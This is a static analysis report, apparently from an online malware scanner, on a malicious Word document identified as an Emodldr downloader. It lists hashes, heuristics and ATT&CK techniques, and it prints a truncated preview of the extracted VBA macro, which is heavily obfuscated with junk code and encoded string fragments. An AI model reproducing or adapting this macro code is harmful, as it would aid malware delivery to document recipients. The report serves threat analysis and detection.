Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 fced990511a17c3f…

MALICIOUS

Office (OLE)

262.0 KB Created: 2018-03-28 14:57:00 Authoring application: Microsoft Office Word First seen: 2018-04-12
MD5: 97853fa0ae974ac9f2e9cafea07ae6a4 SHA-1: b5767e90c1fd322654f51342d7aca51e98148c28 SHA-256: fced990511a17c3f62b727328898e572279f537a60b403d9e93eb7d6841a3d88
244 Risk Score

Malware Insights

MITRE ATT&CK
T1059.005 Visual Basic T1566.001 Spearphishing Attachment

The file contains multiple high-severity heuristics indicating the presence of malicious VBA macros, including AutoOpen and CreateObject calls. The ClamAV detection 'Doc.Malware.Emodldr-10025032-0' further supports its malicious nature. The extracted VBA macro, while heavily obfuscated, likely attempts to download and execute a secondary payload, a common technique for Emodldr malware families.

Heuristics 9

  • ClamAV: Doc.Malware.Emodldr-10025032-0 critical CLAMAV_DETECTION
    ClamAV detected this file as malware: Doc.Malware.Emodldr-10025032-0
  • VBA macros detected medium 3 related findings OLE_VBA_MACROS
    Document contains VBA macro code
  • AutoOpen macro high OLE_VBA_AUTOOPEN
    AutoOpen macro
  • CreateObject call high OLE_VBA_CREATEOBJ
    CreateObject call
  • VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXEC
    Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
  • Legacy WordBasic auto-exec macro marker medium OLE_LEGACY_WORDBASIC_AUTOEXEC
    OLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
  • Excel 4.0 (XLM) macro sheet present medium OLE_XLM_AUTOOPEN
    Workbook contains an Excel 4.0 macro sheet sub-stream — XLM is rarely seen in modern legitimate workbooks and was a major Office malware vector during 2020-2022.
  • Suspicious extracted artifact info EXTRACTED_FILE_STATIC_TRIAGE
    One or more files extracted from inside this sample matched static suspicious-content checks such as script obfuscation, encoded payload blobs, packed data, or execution/download terms.
  • Embedded URL info EMBEDDED_URL
    One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
    URL http://schemas.openxmlformats.org/drawingml/2006/main In document text (OLE body)

Extracted artifacts 1

Files carved from inside the sample during analysis.

FilenameKindSourceSize
macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source) 60000 bytes
SHA-256: c7a65584834e0646d2a0636b0cfcbf86a6d6bd6603e5c36dc793723bbdb49c86
Detection
ClamAV: No threats found
Obfuscation or payload: likely
Carved artifact contains 27 long base64-like blob(s).
Preview script
First 1,000 lines of the extracted script
Attribute VB_Name = "VAAJMqqPZCkr"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True

Attribute VB_Name = "HjULHrXSYQin"
Function murifMX()
On Error Resume Next
Select Case uoDzq
      Case 32844
         QZqwd = CStr(NwidGq + CStr(96167) - arQoHQ * 21858)
      Case 88591
         iYtbQ = CjDdii
         mdmltK = Tan(33008 * MjYiU)
End Select
zjFIGlQds = CGUfo("%iolQA2AGQAMZ%So9", 5, 8)
Select Case mKjAIW
      Case 26843
         YjGzU = CStr(zCMTDt + CStr(9778) - BVXBcq * 43809)
      Case 79485
         wwjPV = cVLTi
         Diwpo = Tan(45527 * WEbar)
End Select
Select Case JWfKL
      Case 44917
         fJmUWz = CStr(kwTLs + CStr(44209) - rfPBf * 62017)
      Case 1297
         XIXmD = AWkuj
         loCKcz = Tan(26315 * nPPlIH)
End Select
VzFVq = CGUfo("vvF1AyAGMAYgBmAD%@Ji", 5, 12)
Select Case qPJjr
      Case 70155
         lizkvB = CStr(ZjRLkU + CStr(5223) - FYiSJP * 16225)
      Case 85775
         dwiJGb = pBICY
         rBMGN = Tan(61916 * ZXnPNK)
End Select
Select Case iMWHEz
      Case 19203
         jCodn = CStr(wDlYvD + CStr(68857) - tCXGH * 94864)
      Case 64884
         pqcHl = ADwro
         Kzptin = Tan(13632 * iBWnM)
End Select
qovSnmNzEE = CGUfo("tjhUO4DgAZQAyAGUAOQA2AGYANgA5AKz", 7, 24)
Select Case TUjzs
      Case 24338
         TMwBfO = CStr(CicEOz + CStr(1278) - MicTqd * 66650)
      Case 78638
         ovRmj = zzbCq
         rrwZOA = Tan(92242 * RYNTX)
End Select
Select Case QRSwF
      Case 38957
         dSpAnz = CStr(zKVHFj + CStr(66371) - fRjiz * 67093)
      Case 9984
         FRbJa = cdtnn
         jIqKB = Tan(20588 * WiwqaZ)
End Select
mvcLUBEmclF = CGUfo("kTb6DKAA3ADQAMQAzAGMAZgAzAGMAYgA4ADMAOQA3ADMAZABiADAANwAzADUAMABiADYAMgBjADEANAA1ADUAOQA0AGUAMwAzADYAOABmAGIAMABhAGYAZAA2ADkAMwBlAGMAMwAwAGc1d", 7, 133)
Select Case mARWX
      Case 11564
         BkjLn = CStr(kirOS + CStr(91485) - cXbWj * 73997)
      Case 3964
         lIaBkV = bLWQhu
         YGwNww = Tan(76550 * iYiJbO)
End Select
Select Case YkIlU
      Case 27343
         ijGmMv = CStr(uJkjJB + CStr(90550) - BjGmcq * 62596)
      Case 99264
         WDNfmP = djXSa
         qlDEVB = Tan(72424 * IcHhi)
End Select
jiwib = CGUfo("aw3hFUazAGEANQBkAGQAMABiADgAMgBmAGQAOQc@", 8, 31)
Select Case ihlCCj
      Case 48031
         JhUHu = CStr(CddcQU + CStr(80695) - iYVfN * 57012)
      Case 27698
         GwDnfv = UQtHac
         kNGKA = Tan(59599 * iQOlKz)
End Select
Select Case SawYni
      Case 73855
         JnofDK = CStr(MuLtH + CStr(81003) - Ytvojw * 33470)
      Case 98658
         AjUTwb = bjfQq
         bZXzr = Tan(20793 * kGiHX)
End Select
ODwTfswA = CGUfo("aoQ41gA0AGIAZQA1ADYAOAAyADIAYwAwAGIANwAxADYAYwAyADkAMwBmADYANQA1AGQANwAyADcAMwAxAGQANgA0ADkAMwAwAGEAYQA4ADgAYgA5AGUAMAA0AGIAOQA2ADkAMwBnOE", 6, 130)
Select Case Edzzp
      Case 44129
         pnwiq = CStr(lUjJb + CStr(49592) - XSVRj * 10184)
      Case 12684
         MuzNww = wckqt
         LnaoJh = Tan(49195 * BzHhT)
End Select
Select Case ckWIMD
      Case 42978
         SZTihz = CStr(cofttl + CStr(34529) - OivZfv * 62203)
      Case 37701
         zVqXpz = JMTzXq
         kvBHZ = Tan(48173 * JoKlHi)
End Select
iZWAuSWTW = CGUfo("MbcA9AHwAOQAxADIANQBkADUAMQA1AGEAYQBmADkANgBjADMAYgAwAGUAZAAxADQAMwAxADQANwAxADIAZQBiADgAMABjAGEAMQBhAGQAMwAwADkAYwA5AGQAZQAwAGIANwA0ADIAOQA4AGEAOABiADUAMAA2ADYAZAA0AGQAMQBiAGIANOnB", 4, 175)
Select Case dqzlF
      Case 54647
         LIFnqB = CStr(jSSbXT + CStr(21350) - ioGuFo * 63845)
      Case 62685
         hSNjWW = ROdYn
         TiXBcV = Tan(83535 * kKFzM)
End Select
Select Case RGriG
      Case 12131
         pGsmD = CStr(WooYjY + CStr(54263) - ZCbZh * 10515)
      Case 91479
         bSpOw = NbiXi
         wMpjiS = Tan(74001 * swTKuk)
End Select
VupDDYzFkiH = CGUfo("JukUUAYQAzAGQANwAyAGIAMgAwADQAOAA5AGUAYgBjAGEAMABhAGIAMwA5ADA
... (truncated)

Open this report in the interactive analyzer, or submit your own file for analysis.